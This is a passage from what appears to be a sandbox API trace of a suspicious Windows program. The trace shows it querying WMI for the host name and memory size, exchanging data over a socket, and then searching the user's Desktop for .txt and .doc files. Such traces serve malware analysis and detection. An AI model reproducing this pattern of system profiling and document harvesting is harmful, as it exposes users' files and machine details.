Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e670 | out: ppvObject=0x38e670*=0x55c5174) returned 0x0 [0231.989] WbemLocator:IRpcOptions:Query (in: This=0x55c5174, pPrx=0x563a638, dwProperty=2, pdwValue=0x38e764 | out: pdwValue=0x38e764) returned 0x80004002 [0231.989] WbemLocator:IUnknown:Release (This=0x55c5174) returned 0x2 [0231.989] CoGetContextToken (in: pToken=0x38eca4 | out: pToken=0x38eca4) returned 0x0 [0231.989] CoGetContextToken (in: pToken=0x38ec04 | out: pToken=0x38ec04) returned 0x0 [0231.989] WbemLocator:IUnknown:QueryInterface (in: This=0x563f688, riid=0x38ecd4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38eba0 | out: ppvObject=0x38eba0*=0x563f688) returned 0x0 [0231.989] WbemLocator:IUnknown:Release (This=0x563f688) returned 0x2 [0231.989] SysStringLen (param_1=0x0) returned 0x0 [0231.989] CoGetContextToken (in: pToken=0x38edbc | out: pToken=0x38edbc) returned 0x0 [0231.989] IWbemServices:ExecQuery (in: This=0x563f688, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x38efcc | out: ppEnum=0x38efcc*=0x544efd0) returned 0x0 [0231.993] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee1c | out: ppvObject=0x38ee1c*=0x544efd4) returned 0x0 [0231.993] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38ee6c, pAuthzSvc=0x38ee68, pServerPrincName=0x38ee60, pAuthnLevel=0x38ee64, pImpLevel=0x38ee54, pAuthInfo=0x38ee58, pCapabilites=0x38ee5c | out: pAuthnSvc=0x38ee6c*=0xa, pAuthzSvc=0x38ee68*=0x0, pServerPrincName=0x38ee60, pAuthnLevel=0x38ee64*=0x6, pImpLevel=0x38ee54*=0x2, pAuthInfo=0x38ee58, pCapabilites=0x38ee5c*=0x1) returned 0x0 [0231.993] IUnknown:Release (This=0x544efd4) returned 0x1 [0231.993] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee10 | out: ppvObject=0x38ee10*=0x55c4bec) returned 0x0 [0231.993] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edfc | out: ppvObject=0x38edfc*=0x544efd4) returned 0x0 [0231.993] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.994] IUnknown:Release (This=0x544efd4) returned 0x2 [0231.994] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0231.994] CoTaskMemFree (pv=0x55febe8) [0231.995] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0231.995] CoGetContextToken (in: pToken=0x38e33c | out: pToken=0x38e33c) returned 0x0 [0231.995] CoGetContextToken (in: pToken=0x38e74c | out: pToken=0x38e74c) returned 0x0 [0231.995] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6e8 | out: ppvObject=0x38e6e8*=0x55c4bd4) returned 0x0 [0231.995] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563a6b0, dwProperty=2, pdwValue=0x38e7dc | out: pdwValue=0x38e7dc) returned 0x80004002 [0231.995] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0231.995] CoGetContextToken (in: pToken=0x38ed1c | out: pToken=0x38ed1c) returned 0x0 [0231.995] CoGetContextToken (in: pToken=0x38ec7c | out: pToken=0x38ec7c) returned 0x0 [0231.996] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ed4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec18 | out: ppvObject=0x38ec18*=0x544efd0) returned 0x0 [0231.996] IUnknown:Release (This=0x544efd0) returned 0x2 [0231.996] SysStringLen (param_1=0x0) returned 0x0 [0231.996] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f018 | out: puCount=0x38f018*=0x2) returned 0x0 [0231.996] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f014*=0x0, pszText=0x0 | out: puBuffLength=0x38f014*=0xf, pszText=0x0) returned 0x0 [0231.996] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f014*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f014*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.996] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0231.996] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f024 | out: ppEnum=0x38f024*=0x544f098) returned 0x0 [0231.998] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eee0 | out: ppvObject=0x38eee0*=0x544f09c) returned 0x0 [0231.998] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef30, pAuthzSvc=0x38ef2c, pServerPrincName=0x38ef24, pAuthnLevel=0x38ef28, pImpLevel=0x38ef18, pAuthInfo=0x38ef1c, pCapabilites=0x38ef20 | out: pAuthnSvc=0x38ef30*=0xa, pAuthzSvc=0x38ef2c*=0x0, pServerPrincName=0x38ef24, pAuthnLevel=0x38ef28*=0x6, pImpLevel=0x38ef18*=0x2, pAuthInfo=0x38ef1c, pCapabilites=0x38ef20*=0x1) returned 0x0 [0231.998] IUnknown:Release (This=0x544f09c) returned 0x1 [0231.998] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eed4 | out: ppvObject=0x38eed4*=0x55c536c) returned 0x0 [0231.998] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eec0 | out: ppvObject=0x38eec0*=0x544f09c) returned 0x0 [0231.998] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0232.000] IUnknown:Release (This=0x544f09c) returned 0x2 [0232.000] WbemLocator:IUnknown:Release (This=0x55c536c) returned 0x1 [0232.000] CoTaskMemFree (pv=0x55fec18) [0232.000] IUnknown:AddRef (This=0x544f098) returned 0x2 [0232.000] CoGetContextToken (in: pToken=0x38e3f0 | out: pToken=0x38e3f0) returned 0x0 [0232.000] CoGetContextToken (in: pToken=0x38e804 | out: pToken=0x38e804) returned 0x0 [0232.000] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e79c | out: ppvObject=0x38e79c*=0x55c5354) returned 0x0 [0232.000] WbemLocator:IRpcOptions:Query (in: This=0x55c5354, pPrx=0x563a8a8, dwProperty=2, pdwValue=0x38e890 | out: pdwValue=0x38e890) returned 0x80004002 [0232.000] WbemLocator:IUnknown:Release (This=0x55c5354) returned 0x2 [0232.001] CoGetContextToken (in: pToken=0x38edd4 | out: pToken=0x38edd4) returned 0x0 [0232.001] CoGetContextToken (in: pToken=0x38ed34 | out: pToken=0x38ed34) returned 0x0 [0232.001] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee04*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ecd0 | out: ppvObject=0x38ecd0*=0x544f098) returned 0x0 [0232.001] IUnknown:Release (This=0x544f098) returned 0x2 [0232.001] SysStringLen (param_1=0x0) returned 0x0 [0232.001] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0232.002] CoTaskMemAlloc (cb=0x4) returned 0x56428b0 [0232.002] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56428b0, puReturned=0x26b3c10 | out: apObjects=0x56428b0*=0x55c6890, puReturned=0x26b3c10*=0x1) returned 0x0 [0232.083] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e67c | out: ppvObject=0x38e67c*=0x55c6890) returned 0x0 [0232.083] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e630 | out: ppvObject=0x38e630*=0x0) returned 0x80004002 [0232.083] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e458 | out: ppvObject=0x38e458*=0x0) returned 0x80004002 [0232.084] IUnknown:AddRef (This=0x55c6890) returned 0x3 [0232.084] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df8c | out: ppvObject=0x38df8c*=0x0) returned 0x80004002 [0232.084] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0232.084] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38df48 | out: ppvObject=0x38df48*=0x55c6894) returned 0x0 [0232.084] IMarshal:GetUnmarshalClass (in: This=0x55c6894, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df50 | out: pCid=0x38df50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0232.084] IUnknown:Release (This=0x55c6894) returned 0x3 [0232.084] CoGetContextToken (in: pToken=0x38dfa8 | out: pToken=0x38dfa8) returned 0x0 [0232.084] CoGetContextToken (in: pToken=0x38e3bc | out: pToken=0x38e3bc) returned 0x0 [0232.084] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e43c | out: ppvObject=0x38e43c*=0x0) returned 0x80004002 [0232.084] IUnknown:Release (This=0x55c6890) returned 0x2 [0232.084] CoGetContextToken (in: pToken=0x38e9a4 | out: pToken=0x38e9a4) returned 0x0 [0232.084] CoGetContextToken (in: pToken=0x38e904 | out: pToken=0x38e904) returned 0x0 [0232.084] IUnknown:QueryInterface (in: This=0x55c6890, riid=0x38e9d4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e9d0 | out: ppvObject=0x38e9d0*=0x55c6890) returned 0x0 [0232.084] IUnknown:AddRef (This=0x55c6890) returned 0x4 [0232.084] IUnknown:Release (This=0x55c6890) returned 0x3 [0232.084] IUnknown:Release (This=0x55c6890) returned 0x2 [0232.084] CoTaskMemFree (pv=0x56428b0) [0232.084] CoGetContextToken (in: pToken=0x38ed14 | out: pToken=0x38ed14) returned 0x0 [0232.084] IUnknown:AddRef (This=0x55c6890) returned 0x3 [0232.084] IWbemClassObject:Get (in: This=0x55c6890, wszName="__GENUS", lFlags=0, pVal=0x38f014*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f094*=0, plFlavor=0x38f090*=0 | out: pVal=0x38f014*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f094*=3, plFlavor=0x38f090*=64) returned 0x0 [0232.085] IWbemClassObject:Get (in: This=0x55c6890, wszName="__PATH", lFlags=0, pVal=0x38eff8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f07c*=0, plFlavor=0x38f078*=0 | out: pVal=0x38eff8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"", varVal2=0x0), pType=0x38f07c*=8, plFlavor=0x38f078*=64) returned 0x0 [0232.085] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x82 [0232.085] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x82 [0232.085] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f024 | out: ppv=0x38f024*=0x6d0cac) returned 0x0 [0232.085] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f01c | out: pAptType=0x38f01c*=1) returned 0x0 [0232.085] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f020 | out: ppvObject=0x38f020*=0x0) returned 0x80004002 [0232.085] IUnknown:Release (This=0x6d0cac) returned 0x1 [0232.086] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e990 | out: ppv=0x38e990*=0x56428b0) returned 0x0 [0232.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x56428b0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eba8 | out: ppvObject=0x38eba8*=0x0) returned 0x80004002 [0232.086] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56428b0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ebb4 | out: ppvObject=0x38ebb4*=0x5644308) returned 0x0 [0232.086] WbemDefPath:IUnknown:Release (This=0x56428b0) returned 0x0 [0232.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7d4 | out: ppvObject=0x38e7d4*=0x5644308) returned 0x0 [0232.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e788 | out: ppvObject=0x38e788*=0x0) returned 0x80004002 [0232.087] WbemDefPath:IUnknown:AddRef (This=0x5644308) returned 0x3 [0232.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e0e4 | out: ppvObject=0x38e0e4*=0x0) returned 0x80004002 [0232.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0232.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e0a0 | out: ppvObject=0x38e0a0*=0x56428c0) returned 0x0 [0232.087] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56428c0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e0a8 | out: pCid=0x38e0a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.087] WbemDefPath:IUnknown:Release (This=0x56428c0) returned 0x3 [0232.087] CoGetContextToken (in: pToken=0x38e100 | out: pToken=0x38e100) returned 0x0 [0232.087] CoGetContextToken (in: pToken=0x38e514 | out: pToken=0x38e514) returned 0x0 [0232.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e594 | out: ppvObject=0x38e594*=0x0) returned 0x80004002 [0232.087] WbemDefPath:IUnknown:Release (This=0x5644308) returned 0x2 [0232.087] WbemDefPath:IUnknown:Release (This=0x5644308) returned 0x1 [0232.087] CoGetContextToken (in: pToken=0x38eea4 | out: pToken=0x38eea4) returned 0x0 [0232.087] CoGetContextToken (in: pToken=0x38ee04 | out: pToken=0x38ee04) returned 0x0 [0232.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644308, riid=0x38eed4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38eed0 | out: ppvObject=0x38eed0*=0x5644308) returned 0x0 [0232.087] WbemDefPath:IUnknown:AddRef (This=0x5644308) returned 0x3 [0232.087] WbemDefPath:IUnknown:Release (This=0x5644308) returned 0x2 [0232.087] WbemDefPath:IWbemPath:SetText (This=0x5644308, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x0 [0232.087] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f050 | out: puCount=0x38f050*=0x2) returned 0x0 [0232.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f04c*=0x0, pszText=0x0 | out: puBuffLength=0x38f04c*=0xf, pszText=0x0) returned 0x0 [0232.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f04c*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f04c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.088] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f01c | out: puCount=0x38f01c*=0x2) returned 0x0 [0232.088] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f018*=0x0, pszText=0x0 | out: puBuffLength=0x38f018*=0xf, pszText=0x0) returned 0x0 [0232.088] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f018*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f018*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.088] IWbemClassObject:Get (in: This=0x55c6890, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x38f018*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b44ac*=0, plFlavor=0x26b44b0*=0 | out: pVal=0x38f018*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096624", varVal2=0x0), pType=0x26b44ac*=21, plFlavor=0x26b44b0*=0) returned 0x0 [0232.088] SysStringByteLen (bstr="2096624") returned 0xe [0232.088] SysStringByteLen (bstr="2096624") returned 0xe [0232.088] IWbemClassObject:Get (in: This=0x55c6890, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x38f020*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b44ac*=21, plFlavor=0x26b44b0*=0 | out: pVal=0x38f020*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096624", varVal2=0x0), pType=0x26b44ac*=21, plFlavor=0x26b44b0*=0) returned 0x0 [0232.088] SysStringByteLen (bstr="2096624") returned 0xe [0232.088] SysStringByteLen (bstr="2096624") returned 0xe [0232.090] CoTaskMemAlloc (cb=0x4) returned 0x56428f0 [0232.090] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56428f0, puReturned=0x26b3c10 | out: apObjects=0x56428f0*=0x0, puReturned=0x26b3c10*=0x0) returned 0x1 [0232.091] CoTaskMemFree (pv=0x56428f0) [0232.091] CoGetContextToken (in: pToken=0x38ef48 | out: pToken=0x38ef48) returned 0x0 [0232.091] IUnknown:Release (This=0x544f098) returned 0x1 [0232.091] IUnknown:Release (This=0x544f098) returned 0x0 [0232.092] CoGetContextToken (in: pToken=0x38ef48 | out: pToken=0x38ef48) returned 0x0 [0232.092] IUnknown:Release (This=0x544efd0) returned 0x1 [0232.092] IUnknown:Release (This=0x544efd0) returned 0x0 [0232.098] CoCreateGuid (in: pguid=0x38ed78 | out: pguid=0x38ed78*(Data1=0x8ab89b0b, Data2=0x55b1, Data3=0x4e1a, Data4=([0]=0xb5, [1]=0xa9, [2]=0xb3, [3]=0xbe, [4]=0x6b, [5]=0x51, [6]=0xf8, [7]=0x74))) returned 0x0 [0232.099] CoCreateGuid (in: pguid=0x38ecbc | out: pguid=0x38ecbc*(Data1=0x9eabab7b, Data2=0xdb7c, Data3=0x4e26, Data4=([0]=0x91, [1]=0xd8, [2]=0x56, [3]=0x39, [4]=0xae, [5]=0x55, [6]=0xcb, [7]=0x67))) returned 0x0 [0232.177] send (s=0x268, buf=0x2608bff*, len=292, flags=0) returned 292 [0232.178] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0232.256] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0232.256] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Desktop", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1b [0232.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.337] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.338] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.txt", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.339] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.339] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.doc*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BY5mTkcZANR.docx", cAlternateFileName="1BY5MT~1.DOC")) returned 0x55b8a68 [0232.339] FindNextFileW (in: hFindFile=0x55b8a68, 